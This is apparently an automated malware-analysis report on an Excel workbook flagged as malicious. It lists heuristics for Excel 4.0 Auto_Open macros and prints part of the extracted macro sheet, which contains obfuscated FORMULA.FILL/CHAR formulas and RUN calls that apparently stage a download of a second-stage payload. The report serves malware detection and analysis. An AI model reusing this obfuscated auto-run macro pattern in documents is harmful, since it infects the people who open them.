Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known technique for executing malicious code upon opening the document. The `RUN` function (API ID 37) and a numerical value (API ID 42) are identified as dangerous formulas, suggesting the macro is designed to execute commands. The macro sheet is likely used to download and execute a second-stage payload.
Heuristics (3)

- Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN: the Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: the workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126486 bytes | 92b60d30c3d53726280f61695c1343c982544130bb193d584d64ffe467e4c27c |
Preview script: first 1,000 lines of the extracted script

```
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!DF42699
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,BT12,"",2.94285614285714292038
' Sheet,FH33,"",174.00000000000000000000
' Sheet,CG34,"",172.37500000000000000000
' Sheet,JA115,"",-1.25791139240506333330
' Sheet,N157,"",-0.11034482758620689502
' Sheet,FS164,"",-1.86486486486486491287
' Sheet,BM214,"",-1.44021739130434789367
' Sheet,H254,"",-4.02222222222222214327
' Sheet,CG338,"",-0.40251572327044027322
' Sheet,BH362,"",0.22612558045628911030
' Sheet,HZ424,"",415.00000000000000000000
' Sheet,DY611,"",0.15841584158415841777
' Sheet,FU655,"",-1.72380952380952390257
' Sheet,FS683,"",2.84782608695652195152
' Sheet,EN719,"",130.00000000000000000000
' Sheet,GD728,"",601.00000000000000000000
' Sheet,BC762,"",-259.00000000000000000000
' Sheet,CF844,"",-492.00000000000000000000
' Sheet,G936,"",242.00000000000000000000
' Sheet,CZ1039,"",292.00000000000000000000
' Sheet,Q1119,"",-195.00000000000000000000
' Sheet,CQ1236,"",-2.70149253731343286233
' Sheet,IK1238,"",-425.00000000000000000000
' Sheet,BN1351,"",526.00000000000000000000
' Sheet,CG1371,"",-192.00000000000000000000
' Sheet,FN1388,"",597.00000000000000000000
' Sheet,IS1395,"",-32.40001953125000255795
' Sheet,BI1403,"",119.00000000000000000000
' Sheet,IS1425,"",-4.52500000000000035527
' Sheet,EX1454,"",-0.08858267716535432601
' Sheet,BN1465,"",0.41603053435114506486
' Sheet,ER1618,"",-412.30031250000001818989
' Sheet,BT1664,"",183.00000000000000000000
' Sheet,EZ1669,"",-3.41509433962264141726
' Sheet,BA1676,"",-1.25791139240506333330
' Sheet,JM1685,"",595.00000000000000000000
' Sheet,GM1787,"",8.06521739130434767162
' Sheet,DW1870,"FORMULA.FILL(CHAR(HF3534-CU43197)&CHAR(L37457*FM5399)&CHAR(FD55734/HS59065)&CHAR(DG54512-ID40497)&CHAR(DG54512+DO9616)&CHAR(DG54512-FV42992)&CHAR(I4978*JU30840)&CHAR(FD55734*BJ43131)&CHAR(JS56319/HQ64661)&CHAR(JS56319/HE4367)&CHAR(I4978*FR49912)&CHAR(DT8029+EL34338)&CHAR(JS56319*FE21444)&CHAR(DG54512-IR54496)&CHAR(FD55734/CI5064)&CHAR(HF3534*BH43676)&CHAR(DT8029+FV7357)&CHAR(JS56319+FH27264)&CHAR(DG54512*A52704)&CHAR(GJ53409-Y57798)&CHAR(DG54512/IE24403)&CHAR(JS56319-IK7208)&CHAR(HF3534-GC10465)&CHAR(EV18137*DF51538)&CHAR(JS56319-GG59638)&CHAR(GJ53409*FS1939)&CHAR(EV18137-DD48098)&CHAR(I4978/JJ34358)&CHAR(GJ53409+DK39293)&CHAR(JS56319-HB49858)&CHAR(FD55734-EJ56591)&CHAR(FD55734+EN65508)&CHAR(JS56319-JM26926)&CHAR(HR60734/EZ1669)&CHAR(DT8029-DF41622)&CHAR(HF3534-EZ61390)&CHAR(EV18137/HP44292)&CHAR(FD55734+BL15711)&CHAR(DG54512*II8871)&CHAR(L37457/FA60130)&CHAR(DT8029+DX13720)&CHAR(EV18137-JB29835)&CHAR(L37457-IY41435)&CHAR(GJ53409+GB4354)&CHAR(I4978/GY34360)&CHAR(L37457-IS9204)&CHAR(I4978/GN57064)&CHAR(L37457*V9070)&CHAR(EV18137*GL19475)&CHAR(L37457*BQ40048)&CHAR(FD55734/IN29941)&CHAR(L37457/FY7078)&CHAR(GJ53409/DT26401)&CHAR(HR60734*HB39025)&CHAR(I4978*HX10223)&CHAR(DG54512/JL28799)&CHAR(EV18137-CM62837)&CHAR(JS56319-GP55541)&CHAR(JS56319+JK20569)&CHAR(FD55734*FT19594)&CHAR(EV18137/FO3021)&CHAR(L37457*BN8218)&CHAR(I4978-GX58480)&CHAR(DT8029*CF46477)&CHAR(FD55734-CK23476),DW1871)",""
' Sheet,DW1872,RUN(HQ29905),""
' Sheet,JI1902,"FORMULA.FILL(CHAR(EV18137/E5096)&CHAR(I4978/JQ4072)&CHAR(DT8029/IN59597)&CHAR(HR60734*CI44637)&CHAR(HR60734/EF55618)&CHAR(EV18137+IJ47291)&CHAR(L37457*GJ33013)&CHAR(DG54512+GT15470)&CHAR(HF3534/BE4059)&CHAR(FD55734+DU60341)&CHAR(GJ53409-EO49890)&CHAR(I4978-ET52087)&CHAR(GJ53409+G936)&CHAR(GJ53409/DW48955)&CHAR(HR60734-CD61410)&CHAR(GJ53409-HO63236)&CHAR(HR60734/IJ48604)&CHAR(HR60734/EX28853)&CHAR(HF3534/IG9794)&CHAR(HR60734+A26731)&CHAR(L37457-JS8700)&CHAR(FD55734+JA9982)&CHAR(DG54512*N41190)&CHAR(EV18137*GY52082)&CHAR(L37457/HK45229)&CHAR(HF35 ... (truncated)
```